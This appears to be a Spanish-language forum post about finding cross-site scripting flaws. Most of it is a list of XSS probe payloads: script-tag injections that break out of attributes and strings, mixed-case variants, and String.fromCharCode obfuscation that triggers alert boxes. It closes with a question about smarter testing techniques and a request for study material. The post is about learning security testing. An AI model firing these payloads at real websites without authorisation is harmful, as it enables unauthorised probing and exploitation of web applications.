Código
"><script>alert("XSS")</script> "><script>alert(String.fromCharCode(88,83,83))</script> '><script>alert("XSS")</script> '><script>alert(String.fromCharCode(88,83,83))</script> <ScRIPt>aLeRT("XSS")</ScRIPt> <ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt> "><ScRIPt>aLeRT("XSS")</ScRIPt> "><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt> '><ScRIPt>aLeRT("XSS")</ScRIPt> '><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt> </script><script>alert("XSS")</script> </script><script>alert(String.fromCharCode(88,83,83))</script> "/><script>alert("XSS")</script> "/><script>alert(String.fromCharCode(88,83,83))</script> '/><script>alert("XSS")</script> '/><script>alert(String.fromCharCode(88,83,83))</script> </SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT> </SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT> </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ";alert("XSS");" ";alert(String.fromCharCode(88,83,83));" ';alert("XSS");' ';alert(String.fromCharCode(88,83,83));' ";alert("XSS") ";alert(String.fromCharCode(88,83,83)) ';alert("XSS") ';alert(String.fromCharCode(88,83,83))
O usando algún programa que pruebe éstos ataques aleatoriamente por uno, como ser el XXSer por ejemplo.... Me gustaría que me dijeran qué técnicas usan ustedes para encontrarlos, si hay alguna forma más "inteligente" que simplemente probando ataques aleatoriamente... Y de paso si tienen algún pdf o cualquier clase de material que me ayuda a entender ésto y pueden aportarlo, sería muuuy bienvenido... Saludos y muchas gracias desde ya!